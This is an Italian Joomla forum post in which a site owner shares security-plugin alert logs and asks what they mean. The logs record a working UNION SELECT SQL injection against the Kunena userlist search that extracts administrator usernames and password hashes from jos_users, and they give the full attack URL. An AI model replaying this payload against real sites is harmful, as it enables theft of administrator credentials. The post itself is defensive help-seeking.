Back to top
Qualche tempo fà ho installato questo plugin- Marco's SQL Injection - LFI Interceptor .Ora mi sono arrivate tre e-mail con il contenuto sotto riportato e in più ho trovato sul pannello amministratore moduli e plugin con il classico lucchetto.Cosa significa avete consigli ?Joomla! 2.5.11
** Union Select [GET:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; ** Table name in url [GET:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; ** Union Select [REQUEST:search] => %' and 1=2) union select 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; ** Table name in url [REQUEST:search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from jos_users where usertype=0x53757065722041646d696e6973747261746f72-- ; **PAGE / SERVER INFO *REMOTE_ADDR : 178.33.80.217 *HTTP_USER_AGENT : MySuperBot 1.02 *REQUEST_METHOD : GET *QUERY_STRING : option=com_kunena&func=userlist&search=%25%27+and+1=2%29+union+select+1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--+; ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP -[option] => com_kunena -[func] => userlist -[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ; *$_POST DUMP *$_COOKIE DUMP *$_REQUEST DUMP -[option] => com_kunena -[func] => userlist -[search] => %' and 1=2) -- 1,2,concat(0x3a,username,0x3a,password,0x3a),3,4,5,6,62,1,1,0,0,0,1,15 from -- users where usertype=0x53757065722041646d696e6973747261746f72-- ;
Copyleft: Tutto il materiale pubblicato o comunque presente all'interno del sito www.joomla.it può essere utilizzato, diffuso e modificato liberamente. Hosting fornito gratuitamente da Joomlahost.it Disegno web da kreatif multimedia srl